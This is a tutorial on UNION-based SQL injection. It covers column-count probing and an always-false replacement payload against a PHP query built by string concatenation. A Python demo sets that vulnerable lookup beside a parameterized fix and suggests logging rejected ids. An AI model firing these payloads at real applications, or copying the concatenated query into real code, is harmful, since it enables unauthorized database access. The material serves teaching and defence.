#### 1. Record union (set union)

(1) Record union (UNION, UNION ALL). `UNION` merges the result sets of two SELECTs and removes duplicate rows; `UNION ALL` keeps every row, duplicates included:

```sql
SELECT * FROM users1 UNION SELECT * FROM users2;

SELECT * FROM users1 UNION ALL SELECT * FROM users2;
```

#### 2. Record union and the injection error logic

The application builds the query by string concatenation:

```php
$sql = "SELECT uname,mobile,gold FROM users where uid=".$id;
```

Normal parameter: `$id=1`. Result:

```sql
SELECT uname,mobile,gold FROM users where uid=10003;
```

Injection logic: if the number of columns in the second part does not match, the page returns an error or renders abnormally. If the number of columns in the second part matches, the page renders normally.

Injecting fields one at a time, `$id=1 union select 1`, with the goal of guessing how many columns the query handles:

```sql
SELECT uname,mobile,gold FROM users where uid=1 UNION SELECT 1
ERROR 1222 (21000): The used SELECT statements have a different number of columns
```

#### 3. Record union and the injection replacement logic

```php
$sql = "SELECT uname,mobile,gold FROM users where uid=".$id;
```

Normal parameter: `$id=1`. Result:

```sql
SELECT uname,mobile,gold FROM users where uid=1;
```

Injection logic: the condition `0=9` is always false, so the first SELECT returns no rows and the result of the whole statement comes from the second SELECT.

Injected parameter: `$id=1 and 0=9 union select 1,2,3`. Result (replacement logic):

```sql
SELECT uname,mobile,gold FROM users where uid=1 and 0=9 UNION SELECT 1,2,3
```
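The two failure modes above (sections 2 and 3) both come from the same root cause: the `uid` value is concatenated into the query text, so the database parses it as SQL. The following is an added example, not code from the page, that reproduces the page's concatenated query against a constructed in-memory SQLite table and places it beside the fix a practitioner would apply: validate that the id is an integer, then bind it as a parameter so it can never be parsed as SQL. The table contents, the `make_db`, `lookup_concat` and `lookup_param` names, and the use of SQLite instead of MySQL are all assumptions made for this example (SQLite's wording of the column-count error differs from MySQL's `ERROR 1222`, but the condition is the same).

```python
import sqlite3

QUERY = "SELECT uname,mobile,gold FROM users WHERE uid="


def make_db() -> sqlite3.Connection:
    """Build a constructed sample users table (not data from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (uid INTEGER, uname TEXT, mobile TEXT, gold INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?,?,?,?)",
        [
            (1, "alice", "13800000001", 500),
            (2, "bob", "13800000002", 20),
        ],
    )
    conn.commit()
    return conn


def lookup_concat(conn: sqlite3.Connection, raw_id: str):
    """Vulnerable form: the page's $sql built by string concatenation.

    Whatever the caller passes becomes part of the SQL text, so a
    trailing UNION is executed as a second SELECT.  Returns the rows,
    or ("ERROR", message) when the database rejects the statement
    (this is the column-count mismatch of section 2).
    """
    sql = QUERY + raw_id
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return ("ERROR", str(exc))


def lookup_param(conn: sqlite3.Connection, raw_id: str):
    """Hardened form: type-validate the id, then bind it as a parameter.

    int() rejects anything that is not a plain integer, and the '?'
    placeholder hands the value to the driver as data, never as SQL, so
    neither the probe of section 2 nor the replacement of section 3 can
    change the statement's shape.  Rejected input yields an empty result.
    """
    try:
        uid = int(raw_id)
    except ValueError:
        # Hypothetical policy for this example: treat malformed ids as "no such user".
        return []
    return conn.execute(QUERY + "?", (uid,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for payload in ("1", "1 union select 1", "1 and 0=9 union select 1,2,3"):
        print(repr(payload))
        print("  concat :", lookup_concat(db, payload))
        print("  param  :", lookup_param(db, payload))
```

Run as a script, the concatenated lookup shows the column-count error for the one-column probe and returns the attacker-supplied row `(1, 2, 3)` for the replacement payload, while the parameterized lookup returns the real user for `1` and nothing for either injected string. For detection, the same validation point is the natural place to log rejected ids: a burst of non-integer `uid` values from one client is the server-side signature of the column-count probing described in section 2.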